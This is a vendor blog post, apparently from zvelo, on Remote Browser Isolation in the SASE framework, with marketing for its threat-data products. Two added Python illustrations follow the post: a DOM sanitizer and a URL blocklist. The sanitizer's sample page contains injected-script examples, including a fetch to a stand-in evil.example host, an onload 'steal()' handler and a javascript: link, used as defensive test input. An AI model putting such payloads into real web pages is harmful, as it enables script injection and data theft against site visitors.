From ransomware to phishing to malware to cross-site scripting, web-borne threats are rampant. According to a recent Verizon report, web application attacks are involved in 26% of all breaches, making them the second most common attack pattern. As we continue to explore the critical role of data in powering the different pieces of the SASE framework, this post focuses on Remote Browser Isolation (RBI) for delivering the next layer of SASE security.
What is Remote Browser Isolation?
Remote Browser Isolation (RBI) delivers secure internet access that protects physical endpoints and networks against browser-based exploits by sandboxing web browsing activity in a remote, cloud-based container. Because browsing takes place in a separate virtual environment, exploits and vulnerabilities stay isolated there, so a potential attack can neither reach nor move laterally within the enterprise network. Although RBI can effectively stop malicious JavaScript from executing in the endpoint browser, its ability to prevent phishing attacks is limited unless it uses threat intelligence to filter and block phishing URLs. Without that phishing intelligence, users can still reach a fake page and enter their credentials.
As more organizations adopt Zero Trust policies, RBI is used to decide which targeted websites can or cannot be trusted, based on web categories, users, and group policies. And while an RBI could be configured to isolate all web browser activity, there are several types of RBI rendering that can be applied depending on the level of security actually required.
Pixel Rendering. Pixel rendering is recommended for high-risk cases, such as targeted industries like finance, healthcare, or government, or for executives and administrators with access to sensitive data, assets, and enterprise network infrastructure. In this case, the webpage loads and executes any code in the virtual container, which then sends a vector graphic representation of the webpage back to the user, preventing any direct interaction between the web content (pictures, fonts, JavaScript, etc.) and the endpoint browser. The downside of this method is the latency it introduces, which may degrade the user experience.
DOM-Based Rendering. Document Object Model (DOM) based rendering is recommended for medium-risk cases and may suit users with limited access to key assets or sensitive data. In this case, the riskier elements of a webpage, such as JavaScript, are executed virtually, sanitized, and rewritten to remove malicious code before being sent back to the user's local browser. Elements typically considered low-risk, like fonts, can be rendered directly in the end user's local browser. Because only some elements are isolated, this causes less latency than pixel rendering.
Streaming Media. Streaming media rendering is generally suited to low-risk streaming sites and other sites where the user experience is important. In this case, safe DOM elements are rendered in the user's local browser, and the streamed media is sent natively to the browser to avoid the latency issues experienced with pixel rendering.
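As an added illustration (not code from the original post or from any vendor's product), the following Python sketch shows the rewrite step of DOM-based rendering: the page fetched in the container is re-emitted with active elements and scriptable attributes removed, while passive elements such as a stylesheet link for fonts, text and images pass through to the local browser. The tag and attribute sets, and the sample page, are assumptions made for the example.

```python
from html import escape
from html.parser import HTMLParser

ACTIVE_TAGS = {"script", "iframe", "object", "embed", "applet"}  # run only in the container
SCRIPT_SCHEMES = ("javascript:", "vbscript:")  # would turn href/src into script

class DomRewriter(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []        # rewritten HTML fragments
        self.dropped = []    # audit trail of stripped elements/attributes
        self._skip = 0       # > 0 while inside an active element

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self._skip += 1
            self.dropped.append(tag)
            return
        if self._skip:
            return
        kept = []
        for name, value in attrs:
            v = (value or "").strip().lower()
            # Event handlers (onload, onerror, ...) and script: URLs are removed;
            # passive attributes such as a font stylesheet href pass through.
            if name.startswith("on") or v.startswith(SCRIPT_SCHEMES):
                self.dropped.append(f"{tag}@{name}")
                continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
    def handle_endtag(self, tag):
        if tag in ACTIVE_TAGS:
            self._skip = max(0, self._skip - 1)
        elif not self._skip:
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        if not self._skip:
            self.out.append(escape(data, quote=False))

def rewrite(page_html):
    """Return (safe_html, dropped) for a page fetched in the container."""
    r = DomRewriter()
    r.feed(page_html)
    r.close()
    return "".join(r.out), r.dropped

# Constructed sample page, not taken from any real site.
SAMPLE = ('<html><head><link rel="stylesheet" href="/fonts.css"></head>'
          '<body onload="steal()"><p>Quarterly report</p><script>fetch("//evil.example/x")'
          '</script><a href="javascript:alert(1)">click</a><img src="/chart.png"></body></html>')
```

The `dropped` list is what an RBI administrator would want logged per session: it records which elements and attributes never reached the endpoint.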
Top Three Use Cases
The first and most common use case for remote browser isolation is eliminating web-based attacks by isolating endpoints and networks from malicious or phishing content. RBI solutions can prevent a variety of browser-based attacks, including drive-by downloads, malvertising, phishing, credential harvesting, redirect attacks, and cross-site scripting.
The second use case is protecting web and cloud applications from attacks. The explosion of cloud and web apps over the last few years has accelerated the need to isolate them from malicious content that may be streamed from unmanaged devices. RBI can hide front-end web code or publicly exposed APIs by rendering a web or cloud app in an isolated container. This Web Application Isolation technique sends only the safe rendering to the local browser, which prevents attackers from examining a page's source code for vulnerabilities and unpatched issues to exploit.
The third use case for Remote Browser Isolation is supporting other tools such as a Secure Web Gateway (SWG), Cloud Access Security Broker (CASB), or the SASE platform of services as a whole by enforcing security policies that ensure secure access to cloud applications from unmanaged devices. For any of these solutions to be effective in preventing attacks, they must have visibility into the traffic they are designed to monitor. And while RBI isn't the only way to monitor access from unmanaged devices, it is a more efficient approach than a reverse proxy, which lacks flexibility and simply isn't designed to support the growing number of cloud apps and unmanaged devices in an enterprise network environment.
Maximize User Protection with Premium Threat Intelligence Data
Using premium data to power an RBI solution enables maximum flexibility in configuring policies for high-risk or non-sanctioned categories, as well as premium threat protection. Notably, to protect against phishing attacks, an RBI tool must leverage high-quality phishing threat intelligence that lets it filter and block active phishing threats. Vendors that select a 'maximum protection' model should focus on threat detection, a highly granular taxonomy for content classification, and the critical capability to block and filter full-path URLs. For those evaluating data vendors to power an RBI solution, these are the areas zvelo recommends analyzing.
Threat Detection Speed. How quickly are new and emerging threats detected: hours, days, longer? While the average time to detect can be tricky to pinpoint, it can be evaluated by measuring one threat feed provider against another. It goes without saying that the fastest time to detect is key.
Accuracy. While the fastest time to detect may be a leading priority, it should not be considered independently of accuracy. A lack of accuracy, or a high false positive rate, can ultimately work against you.
Coverage. Your visibility into the threat landscape, and your ability to protect users and endpoints, depend on having extensive coverage of the ActiveWeb and global clickstream traffic.
Curation vs Aggregation. Data curation is another loosely defined term. Some threat feed providers claim to curate threat feeds when what they really do is aggregate a selection of feeds rather than curate the data those feeds contain. Vendors that add human curation on top of AI-based processes will tend to have maximum coverage with the lowest possible false positive rates.
Content Classification. A premium domain database will also have excellent coverage of all forms of objectionable and other content, giving the vendor the opportunity to offer content-based filtering to supplement phishing and malicious-content protection.
Real-Time Detection/Update Capability. What constitutes 'real-time' in technology applications can vary from minutes to hours. It's important to understand how each threat feed provider defines real-time detection as well as real-time updates (the time between when a threat is detected and when that detection propagates to deployments).
URL Level for Blocking. It's important to be able to filter and block URLs at various levels depending on the implementation: domains, subdomains, IPs, and full-path URLs. In some cases, blocking at the domain or subdomain level is perfectly fine. Other times, full-path URL blocking is necessary to protect against threats embedded more deeply in commonly whitelisted sites like Google Docs, Dropbox, etc.
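An added example (not from the original post or from zvelo's products) of how the blocking level changes what a feed entry can express, in Python: a domain or subdomain entry covers every page under that host, while a full-path entry blocks one shared document on an otherwise allowed site such as Google Docs without blocking the rest of it. The feed entries, hostnames and the document ID are constructed placeholders.

```python
import ipaddress
from urllib.parse import urlsplit

def normalize(url):
    """Split a URL into (host, path); query and fragment are ignored when matching."""
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    host = (parts.hostname or "").rstrip(".")   # hostname is already lower-cased
    return host, parts.path or "/"

class UrlBlocklist:
    def __init__(self):
        self.names = {}     # host suffix -> "domain" | "subdomain"; covers all labels beneath
        self.ips = set()
        self.paths = set()  # (host, path): blocks one page, not the whole site
    def add(self, level, entry):
        if level in ("domain", "subdomain"):
            self.names[entry.lower().rstrip(".")] = level
        elif level == "ip":
            self.ips.add(ipaddress.ip_address(entry))
        elif level == "full-path":
            self.paths.add(normalize(entry))
        else:
            raise ValueError(f"unknown blocking level: {level!r}")
    def match(self, url):
        # Returns (level, entry) of the rule that blocks the URL, or None if allowed.
        host, path = normalize(url)
        try:
            ip = ipaddress.ip_address(host)
        except ValueError:
            ip = None
        if ip is not None:
            if ip in self.ips:
                return ("ip", str(ip))
        else:
            labels = host.split(".")
            for i in range(len(labels)):        # most specific suffix first
                suffix = ".".join(labels[i:])
                if suffix in self.names:
                    return (self.names[suffix], suffix)
        if (host, path) in self.paths:
            return ("full-path", host + path)
        return None

# Constructed feed entries with placeholder names and IDs, not real indicators.
FEED = UrlBlocklist()
FEED.add("domain", "phish-example.test")
FEED.add("subdomain", "files.shared-host.test")
FEED.add("ip", "192.0.2.10")
FEED.add("full-path", "https://docs.google.com/document/d/EXAMPLE-DOC-ID/edit")
```

Note that the full-path entry matches the same document with or without a query string, but a sibling document on the same host stays allowed, which is exactly the granularity a domain-level feed cannot provide.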
How RBI Fits into the SASE Framework
Just as each of the other pieces of SASE has a unique focus, so does Remote Browser Isolation: RBI solutions are designed to protect the web browsing experience. And while limited in its capabilities as a stand-alone solution, RBI plays an important supporting role when combined with a Secure Web Gateway (SWG) or Cloud Access Security Broker (CASB), or as an added security layer in the SASE framework.
How zvelo Fits with Remote Browser Isolation Solutions
zvelo is the #1 provider of premium cyber threat intelligence data, URL database, and web classification services to SASE vendors. zveloDB is the market's premier domain database, with the broadest coverage of phishing, malicious and objectionable content detections, the lowest false positive rate, the fastest time to update, and the best lookup performance. Additionally, the zveloCTI threat data offers both phishing and malicious detection threat feeds to deliver the full-path threat protection you need to power your Remote Browser Isolation, making zvelo a data powerhouse for your DNS Filtering, Secure Web Gateway, CASB and other SASE functions, all available through a single integration.